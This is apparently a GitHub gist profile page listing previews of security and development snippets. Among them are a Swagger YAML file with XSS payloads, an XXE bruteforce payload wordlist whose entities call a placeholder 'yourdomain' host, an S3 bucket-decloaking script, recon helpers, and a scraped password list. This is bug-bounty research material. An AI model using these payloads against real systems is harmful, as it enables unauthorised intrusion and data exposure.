Skip to content

Instantly share code, notes, and snippets.

View vortexau's full-sized avatar

vortex (James McLean) vortexau

View GitHub Profile
vortexau / decompress.ps1
Last active May 13, 2024 07:53
Powershell to decompress DEFLATE data
$base64data = "insert compressed and base64 data here"
$data = [System.Convert]::FromBase64String($base64data)
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null
$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
while ($line = $sr.ReadLine()) {
vortexau /
Last active December 27, 2023 03:09
GCP / GCloud - Golang Private modules

Path from .git/config in origin tag something like

Set the env var like this:

go env -w<PROJECT>/r/\*

Then, go get will work, note .git extension required to work directly over git, this then uses the gcloud credential helper configured in the .git/config inside this repo,

swagger: '2.0'
type: oauth2
authorizationUrl: javascript:alert(document.domain)//
version: "0.0.1"
title: Swagger UI
description: "<svg/onload=alert(1)"
vortexau /
Created October 14, 2020 22:53 — forked from fransr/
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages
# Written by Frans Rosén (
_debug="$2" #turn on debug
#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
vortexau / xxe-payloads.txt
Created September 24, 2020 07:17 — forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist including local DTD payloads from
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
vortexau /
Created September 3, 2020 22:54 — forked from yehgdotnet/
Get Shodan FAVICON Hash
pip install mmh3
# python 2
import mmh3
import requests
response = requests.get('')
favicon = response.content.encode('base64')
vortexau / passwords.txt
Created September 9, 2019 13:01 — forked from tomnomnom/passwords.txt
MySQL Docker Passwords pulled from docker-compose.yml files
vortexau / google-copy.js
Created June 19, 2019 21:31 — forked from tomnomnom/google-copy.js
Bookmarklet to copy URLs from a Google search results page
vortexau /
Created November 7, 2017 00:12
Xamarin Mac Host SSH Connection
#!/usr/bin/env python
import paramiko
import base64
# Run in /mnt/c/Users/<username>/AppData/Local/Xamarin/MonoTouch
# Unfortunately this does NOT work yet, as I do not understand the passphrase.key
# file contents entirely (it appears to be bytes inside the base64 encoded string)
# and how to use it as the SSH key.
with open("passphrase.key", 'r') as file: